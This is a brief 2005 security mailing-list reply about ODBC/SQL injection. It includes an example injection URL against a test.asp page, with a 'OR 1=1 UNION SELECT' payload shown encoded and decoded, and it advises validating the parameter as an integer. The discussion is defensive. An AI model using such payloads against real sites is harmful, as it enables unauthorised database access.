WebApp Sec mailing list archives

Re: ODBC Injection

From: John Bond <john.r.bond () gmail com>
Date: Wed, 30 Nov 2005 12:24:55 +0000

This allready gives out a lot of info, table name and a coloum name.
but i wonder if you could also tack some more sql on the end

e.g
 http://test.com/test.asp?sIdProduct=1%20OR1%3D1%20UNION%20SELECT%20%2A%20FROM%20Products
i.e.
SELECT * FROM Products WHERE idProduct = 1 OR 1=1 UNION SELECT * FROM Products

you should check that the parameter is a valid int before using it.